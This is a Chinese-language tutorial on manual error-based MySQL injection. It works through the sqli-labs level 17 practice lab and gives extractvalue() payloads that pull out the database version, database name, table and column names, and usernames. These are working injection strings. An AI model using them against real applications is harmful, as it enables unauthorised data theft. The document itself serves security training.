MySQL手注之报错注入
报错注入:
指在页面中没有一个合适的数据返回点的情况下,利用mysql函数的报错来创造一个显位的注入。先来了解一下报错注入常用的函数
XML:指可扩展标记语言被设计用来传输和存储数据。
concat:返回结果为连接参数产⽣的字符串
报错注入常用的函数:
extractvalue():对XML文档进行查询的函数
语法:extractvalue(目标xml文档,xml路径)
第二个参数xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。
updataexml():
geometrycollection() :
floor() :
multipoint()
polygon()
exp()
首先看一下源码:
表单源码
这里使用check_input来判断用户输入
验证用户名 和密码是否输入
验证 uname用户输入的用户名是否存在
接受用户输入的新密码,并将新 密码赋值给 passwd
我们只需要在 已知用户名的情况下 进行密码的修改,则在要修改密码的地方就是我们要进行报错注入的地方。
下面进入靶场演练,这里用的是sqli-labs的17关
利用extractvalue()演练
寻找一个已知的用户名 这里为admin
爆数据库版本
在密码框输: xxx' and extractvalue(1,concat(0x7e,(select @@version),0x7e))#
要先随便输入一个参数让语句闭合,从而执行我们想要查询的语句,如下就爆出数据库的版本为5.5.53 则可以替换任何你想查询的数据。
爆数据库名称
这里将@@version替换成了database() 爆出 数据库名称
爆表名
and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e))#
这里 爆出许多表 显然users 是我们感兴趣的
爆列名
and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),0x7e))#
爆数据
and extractvalue(1,concat(0x7e,(select * from (select username from users limit 0,1) as a),0x7e))#